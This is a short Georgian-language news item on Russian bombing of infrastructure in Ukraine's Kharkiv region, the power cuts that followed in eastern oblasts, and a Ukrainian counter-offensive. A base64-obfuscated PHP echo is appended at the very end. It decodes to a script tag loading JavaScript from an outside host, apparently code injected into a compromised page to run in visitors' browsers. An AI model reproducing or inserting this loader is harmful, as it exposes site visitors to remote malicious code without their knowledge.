tube
ავერსი jaluzi
უკრაინული მედიის ინფორმაციით, რუსმა ოკუპანტები ხარკოვის ოლქი დაბომბეს. მედია ოფიციალურ წყაროებე დაყრდნობით წერს, რომ რუსებმა კრიტიკულ ინფრასტრუქტურულ ობიექტებს დაარტყეს და ამ დროისთვის ტერიტორიაზე დიდი ხანძარია.  
 
აქვე, ირკვევა, რომ დაბომბვების შემდეგ ოლქის გარკვეულ ნაწილს ელეტქრომომარაგება შეუწყდა, თუმცა მედია წერს, რომ რამდენიმე დასახლებაში ეს პრობლემა უკვე აღმოფხვრილია.
 
უკრანის აღმოსავლეთ ოლქებში ელექტროენერგიის მასობრივი გათიშვა დაადასტურა პრეზიდენტმა ზელენსკიმაც. მისი თქმით, მთლიანად გაითიშა ხარკოვისა და დონეცკის ოლქები, ნაწილობრივ კი - დნეპროპეტროვსკის, ზაპოროჟიეს და სუმის ოლქები.
 
შეგახსენებთ, რომ უკრაინის შეიარაღებულმა ძალებმა ხარკოვის ოლქში 40-ზე მეტი დასახლება გაათავისუფლეს. ამის შესახებ ოლქის სამხედრო ადმინისტრაციის ხელმძღვანელმა, ოლეგ სინებუგოვმა ისაუბრა.
479
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");